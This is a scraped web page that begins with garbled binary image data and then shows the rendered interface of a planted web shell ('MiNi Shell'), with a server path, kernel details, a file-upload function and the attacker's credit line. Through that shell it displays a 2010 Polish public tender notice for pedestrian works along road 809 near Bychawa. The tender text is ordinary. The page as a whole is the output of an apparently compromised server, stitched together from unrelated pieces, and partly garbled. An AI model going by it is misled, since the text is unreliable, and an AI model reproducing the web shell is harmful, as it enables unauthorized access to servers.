JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100621/175788-N-2010.html

<p class="kh_header"><b>Bychawa: Przebudowa drogi wojewódzkiej Nr 809 Lublin - Krasienin - Kierzkówka - Przytoczno w zakresie realizacji ciągów pieszych w m. Marysin</b><br>
<b>Numer ogłoszenia: 175788 - 2010; data zamieszczenia: 21.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Lublinie z/s w Bychawie , ul. Antoniego Budnego 5, 23-100 Bychawa, woj. lubelskie, tel. 081 5661393 w. 28, faks 081 5660256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi wojewódzkiej Nr 809 Lublin - Krasienin - Kierzkówka - Przytoczno w zakresie realizacji ciągów pieszych w m. Marysin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje przebudowę drogi wojewódzkiej Nr 809 Lublin - Krasienin - Kierzkówka - Przytoczno  w zakresie realizacji ciągów pieszych w m. Marysin, Kol. Natalin, Snopków od km 2+491,4 do km 5+628 tj.:
-	roboty pomiarowe
-     wycinka drzew
-	karczowanie pni drzew
-	karczowanie krzewów
-	wywiezienie dłużyc, karpiny i gałęzi
-	usunięcie humusu gr. do 15 cm  
-	rozbiórka ścianek czołowych przepustu
-	rozbiórka nawierzchni z mas mineralno-bitumicznych
-	rozbiórka nawierzchni z betonu i płyt drogowych
-	rozbiórka przepustów rurowych
-	rozbiórka podbudowy z kruszywa
-	rozbiórka murków betonowych
-	rozbiórka krawężników betonowych
-	rozbiórka barier drogowych
-	demontaż słupków do znaków drogowych
-	demontaż tablic drogowych
-	roboty ziemne - wykopy, nasypy
-	plantowanie skarp i korony nasypów
-	oczyszczenie przepustów rurowych z namułu
-	wykonanie części przelotowych prefabrykowanych przepustów drogowych o różnej średnicy wraz z wykonaniem ścianek czołowych
-	ułożenie przepustów z rur spiralnie karbowanych HPDE wraz z umocnieniem wlotów i wylotów
-	wykonanie studni rewizyjnych
-	ułożenie rur osłonowych PE o różnej średnicy
-	regulacja pionowa studzienek i zaworów wodociągowych
-	profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni
-	wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie
-	wykonanie podbudowy z gruntu stabilizowanego cementem
-	wykonanie podbudowy z chudego betonu
-	wykonanie nawierzchni zjazdów z BA 0/12,8 mm
-	budowa zatok autobusowych z kostki brukowej betonowej gr. 8 cm
-	budowa chodników z kostki brukowej betonowej gr. 6 i 8 cm
-	humusowanie i obsianie skarp
-	umocnienie skarp i dna rowu płytami betonowymi, ażurowymi oraz poprzez darniowanie
-	uzupełnienie poboczy kruszywem łamanym
-	oznakowanie poziome jezdni materiałami grubowarstwowymi - linie segregacyjne, na skrzyżowaniach i przejściach dla pieszych
-	pionowe znaki drogowe - słupki z rur stalowych O 70 mm
-	pionowe znaki drogowe - słupki prowadzące z grupy U
-	pionowe znaki drogowe - znaki zakazu, ostrzegawcze i informacyjne
-	przestawienie pionowych znaków drogowych  
-	ustawienie barier ochronnych stalowych
-	ustawienie krawężników 12x25, 15x30, 20x30 na ławie betonowej
-	ustawienie obrzeży 20x6
-	ustawienie palisad betonowych 12x18x80
-	przebrukowanie nawierzchni z kostki brukowej betonowej na zjazdach
-	ułożenie ścieku podchodnikowego z płyt betonowych
-	wykonanie muru oporowego. 
2.	Szczegółowy zakres robót ujęty jest w projekcie budowlanym, w Szczegółowych Specyfikacjach Technicznych oraz w przedmiarze robót stanowiącym część pomocniczą określenia ilości robót. 
3.	W załączeniu do oferty Wykonawca złoży wstępny harmonogram robót.
4.	Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową, na podstawie projektu czasowej organizacji ruchu (dostarczonego przez Zamawiającego).  
5.	Na wbudowane materiały Wykonawca winien przedłożyć aprobaty techniczne  i świadectwa jakości.
6. Wykonawca zobowiązany jest do opracowania i zatwierdzenia planu bezpieczeństwa  i ochrony zdrowia, programu zapewnienia jakości.
7.	Wszystkie badania kontrolne robót określone w specyfikacjach technicznych wykonane zostaną na koszt Wykonawcy i przedłożone Inspektorowi Nadzoru celem akceptacji.
8.	Okres rękojmi za wady dla robót objętych zamówieniem wynosi 3 lata od daty odbioru ostatecznego.
 9.	Zgodnie z art. 30 ust. 4 ustawy Prawo zamówień publicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca który powołuje 
się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wskazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych).
10.	Budowę chodnika należy wykonać zgodnie z następującymi specyfikacjami technicznymi:
D 00.00.00 Wymagania ogólne
D 01.01.01/01.02.01/01.02.02/01.02.04 Prace pomiarowe / Usunięcie drzew lub 	krzewów / Zdjęcie warstwy humusu/Rozbiórka elementów dróg
D 02.00.01	Roboty ziemne. Wymagania ogólne
D 02.01.01	Wykonanie wykopów
D 02.03.01	Wykonanie nasypów
D 03.01.01	Przepust pod koroną drogi  
D 03.01.03	Czyszczenie urządzeń odwadniających 
D 03.02.01	Kanalizacja deszczowa  
D 03.02.01a Regulacja pionowa studzienek dla urządzeń podziemnych 
D 04.01.01	Koryto wraz z profilowaniem i zagęszczaniem podłoża 
D 04.04.02	Podbudowa z kruszywa łamanego stabilizowanego mechanicznie  
D 04.05.01	Podbudowa i ulepszone podłoże z gruntu stabilizowanego cementem  
D 04.06.01	Podbudowa z chudego betonu  
D 05.03.05	Nawierzchnia z betonu asfaltowego  
D 05.03.23	Nawierzchnia z kostki brukowej betonowej  
D 06.01.01	Umocnienie skarp, rowów i ścieków 
D 06.02.01a Przepusty pod zjazdami z rur polietylenowych HDPE spiralnie 		karbowanych  
D 06.03.01	Uzupełnienie poboczy kruszywem łamanym 
D 07.01.01	Oznakowanie poziome nawierzchni  
D 07.02.01	Oznakowanie pionowe  
D 07.02.03	Remont oznakowania pionowego (przestawienie znaków)  
D 07.05.01	Bariery ochronne stalowe  
D 07.06.02	Urządzenia zabezpieczające ruch pieszych  
D 08.01.01	Krawężniki betonowe 
D 08.02.02	Chodnik z betonowej kostki brukowej wibroprasowanej  
D 08.03.01	Betonowe obrzeża chodnikowe  
D 08.04.01	Wykonanie zjazdów z brukowej kostki betonowej  
D 08.05.05	Ścieki z płyt chodnikowych  
D 10.05.05	Mury oporowe.
Wielkość lub zakres zamówienia: 1 339 452,32 zł. netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.12.00-0, 45.11.12.30-9, 45.11.12.40-2, 45.23.32.20-7, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. 	Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości - 10000,00 zł, słownie złotych: dziesięć tysięcy 00/100,
2. 	Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
3. 	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW 
w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4. 	W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1. Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt.1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2002 Nr 72 poz. 665 j. t.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2. Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie niżej podanymi, w pełni sprawnymi jednostkami sprzętowymi:
- piła mechaniczna- 1 szt.
- piła do cięcia asfaltu i betonu- 1 szt	
- szczotka mechaniczna- 1 szt.
- skrapiarka lepiszcza- 1 szt.
- układarka do mieszanek mineralno-asfaltowych typu zagęszczanego	- 1 szt.
- walec stalowy	- 1 szt.
- walec ogumiony	- 1 szt.
- samochody samowyładowcze z przykryciem brezentowym- 2 szt.
- zagęszczarka mechaniczna	- 1 szt.
- koparka podsiębierna	- 1 szt.
- spycharka- 1 szt.
- ładowarka	- 1 szt. 
- samochody samowyładowcze- 1 szt.
- wibratory płytowe z osłoną z tworzywa sztucznego	- 1 szt.
- ubijaki mechaniczne lub małe walce wibracyjne- 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie minimum po jednej osobie przewidzianej do pełnienia funkcji:
a) kierownika budowy -  z minimum 5 letnim doświadczeniem w pracy na stanowisku kierownika budowy/robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej oraz aktualne ubezpieczenie od odpowiedzialności cywilnej poświadczone przez odpowiedni  organ samorządu zawodowego.
b)	kierownika robót - z minimum 3 letnim doświadczeniem w pracy na stanowisku kierownika budowy/robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci i urządzeń wod. kan. oraz aktualne ubezpieczenie od odpowiedzialności cywilnej poświadczone przez odpowiedni organ samorządu zawodowego,
c)	kierownika robót - z minimum 3 letnim doświadczeniem w pracy na stanowisku kierownika budowy/robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności telekomunikacyjnej oraz aktualne ubezpieczenie od odpowiedzialności cywilnej poświadczone przez odpowiedni organ samorządu zawodowego,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dokument potwierdzający wniesienie wadium.
 2)  wstępny harmonogram robót 
3) Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić podwykonawcy - jeżeli Zamawiający zamierza powierzyć roboty podwykonawcom.
4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo Zamówień Publicznych.
5) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu 
o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na zmianie terminu wykonania umowy w przypadku wystąpienia okoliczności wymienionych poniżej:
1) Spowodowane warunkami atmosferycznymi:
a)	klęski żywiołowe,
b)	gdy warunki atmosferyczne odbiegają od warunków określonych w SST i uniemożliwiają prowadzenie robót budowlanych przeprowadzenie prób i sprawdzeń oraz dokonywanie odbiorów
 2)  Spowodowane warunkami geologicznymi, archeologicznymi:
a)	niewybuchy, niewypały
b)	wykopaliska archeologiczne
 3) konieczności wykonania robót dodatkowych od których realizacji uzależnione jest wykonanie zamówienia podstawowego;
4)wstrzymanie realizacji umowy przez Zamawiającego, konieczność usunięcia błędów lub wprowadzenia zmian w projekcie budowlanym;
5)	siły wyższej, której strony nie mogły przewidzieć, której nie mogły zapobiec ani której nie mogą przeciwdziałać, a która uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pok. nr 1 (cena 8,00 zł) lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres e-mail: rdw.lublin@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2010 godzina 11:45, miejsce: w siedzibie zamawiającego w pok. nr 5, otwarcie ofert - godz.12:00 w pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający 
i Wykonawcy przekazują pisemnie - pocztą, za pomocą faksu nr (81) 566 02 56 lub drogą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl .
Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron 
na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z wykonawcami: 
-	W sprawach technicznych - P. Edward Rudzik, tel. (81) 566 13 93 w. 23, w. 25,
- 	W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - P. Anna Kaczor, P. Ireneusz Król, tel. (81) 566-13-92, 566-13-93 w. 28.
UWAGA:
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają się ubiegać o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem na numer (81) 566-02-56  lub pocztą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl, zawierającej podstawowe dane firmy (nazwa, adres, numer telefonu i faksu). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, odwołaniach dotyczących SIWZ, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com